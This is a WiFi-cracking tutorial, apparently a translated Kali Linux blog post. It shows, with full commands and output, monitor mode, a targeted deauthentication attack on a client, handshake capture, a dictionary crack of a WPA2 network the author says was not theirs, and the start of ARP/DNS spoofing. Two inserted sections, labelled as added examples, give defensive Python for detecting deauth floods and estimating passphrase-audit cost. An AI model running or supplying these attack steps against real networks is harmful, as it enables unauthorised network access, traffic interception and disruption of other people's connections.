
Contents

    • Put the wireless card into monitor mode
      • Checking the result
    • Scan for WiFi networks
    • Start capturing packets
      • Force a client off the WiFi
    • Password dictionary
    • Brute-force cracking
    • Afterwards
      • Testing the WiFi connection
    • NetworkManager conflicts
    • Reference for the connection configuration file
    • After connecting to the WiFi

Put the wireless card into monitor mode

Open a terminal and list the wireless interfaces with airmon-ng:

root@kali:~/capture# airmon-ng

PHY	Interface	Driver		Chipset

phy1	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

root@kali:~/capture# airmon-ng start wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    702 NetworkManager
    949 wpa_supplicant

PHY	Interface	Driver		Chipset

phy1	wlan0		rt2800usb	Ralink Technology, Corp. RT2870/RT3070

		(mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
		(mac80211 station mode vif disabled for [phy1]wlan0)

Checking the result

Run iwconfig to inspect the interface; if the name now reads wlan0mon (mon appended), monitor mode is enabled.

root@kali:~/capture# ifconfig
wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 00-0F-02-29-98-3D-30-3A-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 262  bytes 59606 (58.2 KiB)
        RX errors 0  dropped 262  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Scan for WiFi networks

Run airodump-ng wlan0mon to start scanning; press Ctrl+C to stop.

root@kali:~/Downloads# airodump-ng wlan0mon
 CH  3 ][ Elapsed: 1 min ][ 2019-11-15 18:09                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 06:05:88:09:5E:89  -44       35        0    0  11  130  OPN              EWEB_WiFi                                         
 FC:53:9E:BA:BC:27  -45       55        1    0   6  180  WPA2 CCMP   PSK  MEIZU E3                                          
 06:05:88:09:5E:75  -46       39        0    0   6  130  OPN              EWEB_WiFi                                         
 06:05:88:09:5E:91  -50       37        0    0  11  130  OPN              EWEB_WiFi                                         
 F0:C8:50:53:DB:70  -50       46        0    0  11   65  WPA2 CCMP   PSK  shuaibi                                           
 06:05:88:09:5E:A9  -53       40        3    0   1  130  OPN              EWEB_WiFi                                         
 24:69:68:CE:18:7A  -54       28       17    0   1  405  WPA2 CCMP   PSK  TP-LINK_505                                       
 06:05:88:09:5E:79  -55       22        0    0   1  130  OPN              EWEB_WiFi                                         
 36:69:68:CE:18:7A  -56       29        0    0   1  405  WPA2 CCMP   PSK  TPGuest_187A                                       
 06:05:88:09:5E:7D  -57       35        0    0  11  130  OPN              EWEB_WiFi     

BSSID is the access point's MAC address; PWR is the signal strength; #Data is the amount of data traffic (the larger it is, the more clients are using the network); CH is the channel; ESSID is the network name (Chinese names may display as garbled characters).

Start capturing packets

Next, run airodump-ng --bssid <BSSID> -c <channel> -w <capture file path prefix> wlan0mon:

airodump-ng --bssid F0:C8:50:53:DB:70 -c 11 -w /home/wifi wlan0mon

Target chosen: F0:C8:50:53:DB:70 -50 46 0 0 11 65 WPA2 CCMP PSK shuaibi

root@kali:~# airodump-ng -c 11 --bssid F0:C8:50:53:DB:70 -w ~/capture/ wlan0mon
 CH 11 ][ Elapsed: 1 min ][ 2019-11-15 18:38 ][ WPA handshake: F0:C8:50:53:DB:70                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 F0:C8:50:53:DB:70  -47  89      638       64    0  11   65  WPA2 CCMP   PSK  shuaibi                    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
 F0:C8:50:53:DB:70  00:5B:94:A0:B4:03  -56    1e- 1      0     2671       

STATION: clients associated with this AP.
The handshake has already been captured at this point:

CH 11 ][ Elapsed: 1 min ][ 2019-11-15 18:38 ] [WPA handshake: F0:C8:50:53:DB:70

Packets are now being captured.

Force a client off the WiFi

Principle: send a deauth (deauthentication) frame to a device connected to the WiFi so that it drops off the network; it will naturally reconnect shortly afterwards.

Type aireplay-ng -0 <count> -a <BSSID> -c <MAC address of a phone connected to the WiFi> <interface> (usually wlan0mon):
aireplay-ng -0 10 -a F0:C8:50:53:DB:70 -c 00:5B:94:A0:B4:03 wlan0mon

root@kali:~/Downloads# aireplay-ng -0 10 -a F0:C8:50:53:DB:70 -c 00:5B:94:A0:B4:03 wlan0mon
18:37:58  Waiting for beacon frame (BSSID: F0:C8:50:53:DB:70) on channel 11
18:37:59  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 3|56 ACKs]
18:37:59  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|57 ACKs]
18:38:00  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|55 ACKs]
18:38:00  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 2|57 ACKs]
18:38:01  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|60 ACKs]
18:38:01  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|58 ACKs]
18:38:02  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|58 ACKs]
18:38:03  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 0|59 ACKs]
18:38:03  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|54 ACKs]
18:38:04  Sending 64 directed DeAuth (code 7). STMAC: [00:5B:94:A0:B4:03] [ 1|57 ACKs]

(-0 0 sends deauth frames to the device indefinitely; -0 10 attacks 10 times. The idea is: first knock the device offline, it then reconnects automatically, and during that automatic reconnection a three-way handshake takes place and TCP packets are sent (containing the encrypted password data); we pose as the WiFi hotspot and capture those packets. Once captured, the encrypted WiFi password can be brute-forced by exhausting a dictionary; the password in the packets is hashed, and hashing only works in the forward direction.)
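The deauthentication flood described above is just as easy to recognise from the defender's side: a monitor-mode capture of management frames shows hundreds of deauth frames with reason code 7 aimed at one station within a few seconds, whereas normal roaming produces at most a handful. The Python below is an added example, not code from the original post or from the aircrack-ng suite: a rate-based detector run over a constructed frame log. The record format, the timestamps, the 5-second window and the threshold of 20 are my own assumptions; the BSSID and station MAC are the ones from the aireplay-ng output above.

```python
"""Rate-based detector for 802.11 deauthentication floods.

Added example (not code from the original post). Input records use a
constructed format, one frame per line:
    <seconds since capture start> <subtype> <bssid> <station> <reason code>
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Iterable, List, Tuple


@dataclass(frozen=True)
class Frame:
    ts: float
    subtype: str   # "deauth", "disassoc", "beacon", ...
    bssid: str
    sta: str
    reason: int


def parse_frame(line: str) -> Frame:
    """Parse one constructed record; MAC addresses are normalised to upper case."""
    ts, subtype, bssid, sta, reason = line.split()
    return Frame(float(ts), subtype.lower(), bssid.upper(), sta.upper(), int(reason))


def detect_deauth_floods(frames: Iterable[Frame], window_s: float = 5.0,
                         threshold: int = 20) -> List[Tuple[str, str, float, int]]:
    """Return one alert (bssid, station, window_start, count) per (bssid, station)
    pair that receives more than `threshold` deauth/disassoc frames inside any
    `window_s`-second sliding window.  Beacons and data frames are ignored."""
    recent = defaultdict(deque)   # (bssid, sta) -> timestamps still inside the window
    alerted = set()
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype not in ("deauth", "disassoc"):
            continue
        key = (f.bssid, f.sta)
        q = recent[key]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # evict timestamps that fell out of the window
            q.popleft()
        if len(q) > threshold and key not in alerted:
            alerted.add(key)
            alerts.append((f.bssid, f.sta, q[0], len(q)))
    return alerts


def build_sample_log() -> List[str]:
    """Constructed sample: one legitimate deauth (reason 3, station leaving) at t=0,
    a beacon, then a flood mirroring the aireplay-ng run on the page: 10 bursts of
    64 directed deauth frames (reason 7) spread over about six seconds from t=100."""
    ap, sta = "F0:C8:50:53:DB:70", "00:5B:94:A0:B4:03"
    lines = [f"0.000 deauth {ap} {sta} 3", f"0.100 beacon {ap} FF:FF:FF:FF:FF:FF 0"]
    for burst in range(10):
        for i in range(64):
            lines.append(f"{100.0 + burst * 0.6 + i * 0.005:.3f} deauth {ap} {sta} 7")
    return lines


if __name__ == "__main__":
    for bssid, sta, start, count in detect_deauth_floods(map(parse_frame, build_sample_log())):
        print(f"ALERT deauth flood: AP {bssid} -> STA {sta}, {count} frames from t={start:.3f}s")
```

To run it on real traffic, produce lines in the same five-field format from a monitor-mode capture (for example from tshark -T fields output restricted to deauth and disassoc frames) and tune the threshold to the site. Detection only tells you it happened; the mitigation is 802.11w Protected Management Frames (PMF), which authenticates deauth and disassoc frames so that a forged one is discarded by the client instead of dropping the connection.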

cd into the capture directory and list it with ls; you can see the packets we captured:

root@kali:~# ll  capture/
-rw-r--r--  1 root root 1005912 11月 15 18:38 -01.cap            # handshake capture
-rw-r--r--  1 root root     477 11月 15 18:38 -01.csv            # AP and client information
-rw-r--r--  1 root root     587 11月 15 18:38 -01.kismet.csv     # AP information in Kismet CSV format
-rw-r--r--  1 root root    2756 11月 15 18:38 -01.kismetxml  # same content as -01.kismet.csv
-rw-r--r--  1 root root  402226 11月 15 18:38 -01.log.csv        # log

Password dictionary

  • Extract the wordlist that ships with Kali, at /usr/share/wordlists/rockyou.txt.gz:
gzip -d /usr/share/wordlists/rockyou.txt.gz

Brute-force cracking

Type aircrack-ng -w <dictionary path> <handshake capture path> and press Enter to start cracking:

aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/capture/-01.cap

("The WiFi password cracked here was not one I set myself, so it was genuinely hard!")
Now wait patiently for the password to crack...

Note: brute-forcing is not easy; it takes a sufficiently strong dictionary and plenty of time. You can build your own dictionary with a wordlist generator, and the stronger the dictionary, the easier the crack. Haha, a bit of luck is needed too!

Afterwards

Stop monitor mode:

root@kali:/usr/share/wordlists# airmon-ng stop wlan0mon
PHY	Interface	Driver		Chipset
phy1	wlan0mon	rt2800usb	Ralink Technology, Corp. RT2870/RT3070
		(mac80211 station mode vif enabled on [phy1]wlan0)
		(mac80211 monitor mode vif disabled for [phy1]wlan0mon)
root@kali:/usr/share/wordlists# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:0f:02:29:98:3e  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Testing the WiFi connection

root@kali:~# iw dev wlan0 scan ssid shuaibi | grep SSID
	SSID: EWEB_WiFi
	SSID: 206
	SSID: EWEB_WiFi
	SSID: \xe2\x88\x9e
	SSID: shuaibi
root@kali:~# wpa_passphrase "shuaibi" "12345678" | tee Documents/read/wifi暴力破解测试/shuaibi.wifi.conf
network={
	ssid="shuaibi"
	#psk="12345678"
	psk=756c48293ab614daedef5bae261bf6001dca127fecbd44dfa9cc3066a2d8ce43
}
root@kali:~# wpa_supplicant -B -iwlan0 -c Documents/read/wifi暴力破解测试/shuaibi.wifi.conf && dhclient wlan0
Successfully initialized wpa_supplicant
RTNETLINK answers: File exists
root@kali:~# iw dev
phy#1
	Interface wlan0
		ifindex 6
		wdev 0x100000003
		addr 00:0f:02:29:98:3e
		ssid shuaibi
		type managed
		channel 11 (2462 MHz), width: 20 MHz, center1: 2462 MHz
		txpower 20.00 dBm
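The brute-force explanation earlier (the password in the capture is "hashed" and only works forward) and the psk= line that wpa_passphrase prints in the connection test above are the same computation: IEEE 802.11i derives the 256-bit WPA2 pre-shared key as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations). What airodump-ng reports as "WPA handshake" is the EAPOL 4-way handshake that follows (re)association, and each candidate passphrase checked against it costs those 4096 HMAC-SHA1 rounds, with the SSID acting as the salt, which is why a precomputed table helps only for one network name and why the author says cracking needs a strong dictionary and time. The Python below is an added example, not code from the original post or from wpa_supplicant: it reproduces the psk shown above for SSID "shuaibi" and passphrase "12345678" and estimates, for a passphrase-strength audit of a network you administer, how long a wordlist of a given size would take on this host. The function names, the constructed candidate strings and the sample sizes are my own.

```python
"""WPA2-PSK derivation (IEEE 802.11i) and a passphrase-audit cost estimate.

Added example, not code from the original post or from wpa_supplicant.
PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), which is
exactly what `wpa_passphrase <ssid> <passphrase>` prints on its psk= line.
"""
import hashlib
import hmac
import time

PBKDF2_ITERATIONS = 4096   # fixed by the 802.11i standard
PSK_BYTES = 32             # 256-bit key


def wpa2_psk(ssid: str, passphrase: str) -> str:
    """Return the 64-hex-character PSK for this SSID/passphrase pair."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"),
                               PBKDF2_ITERATIONS, PSK_BYTES).hex()


def psk_matches(ssid: str, passphrase: str, expected_psk_hex: str) -> bool:
    """Constant-time check of a candidate passphrase against a PSK you already hold
    (e.g. the psk= line of a wpa_supplicant.conf you administer)."""
    return hmac.compare_digest(wpa2_psk(ssid, passphrase), expected_psk_hex.lower())


def guesses_per_second(ssid: str = "shuaibi", samples: int = 200) -> float:
    """Measure this host's single-threaded PBKDF2 rate using constructed candidates."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_psk(ssid, f"constructed-candidate-{i:06d}")
    return samples / (time.perf_counter() - start)


def wordlist_hours(words: int, rate: float) -> float:
    """Hours needed to try `words` candidates at `rate` guesses per second."""
    return words / rate / 3600.0


if __name__ == "__main__":
    # Value printed by wpa_passphrase in the connection test on the page.
    page_psk = "756c48293ab614daedef5bae261bf6001dca127fecbd44dfa9cc3066a2d8ce43"
    print("derived psk :", wpa2_psk("shuaibi", "12345678"))
    print("matches page:", psk_matches("shuaibi", "12345678", page_psk))
    rate = guesses_per_second()
    print(f"this host: {rate:.0f} guesses/s; a 10-million-word list would take "
          f"{wordlist_hours(10_000_000, rate):.1f} h single-threaded")
```

The rate measured here is for one CPU core in Python's hashlib; GPU crackers are orders of magnitude faster, so treat the estimate as a lower bound when judging whether a passphrase policy is adequate. The practical consequence is the usual one: a long random passphrase (or WPA3-SAE, which does not expose an offline-guessable handshake) is the defence, not the SSID.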

NetworkManager conflicts

Connecting directly from the command line, or configuring the IP address and so on in /etc/network/interfaces, may leave the NetworkManager service unable to display the connection properly.

Reference: enabling and disabling NetworkManager

service network-manager stop # stop the NetworkManager service
rm /var/lib/NetworkManager/NetworkManager.state # remove NetworkManager's state file
gedit /etc/NetworkManager/nm-system-settings.conf # open NetworkManager's configuration file

## it contains a line: managed=true
## if you have edited /etc/network/interfaces by hand, NetworkManager changes this line to managed=false
## change false back to true

service network-manager start

Reference for the connection configuration file

/usr/share/doc/wpasupplicant/examples/wpa_supplicant.conf

After connecting to the WiFi

Use ARP spoofing and DNS spoofing to go a step further:

apt-get install dsniff ssldump             # install arpspoof and related tools
echo 1 > /proc/sys/net/ipv4/ip_forward     # enable IP forwarding
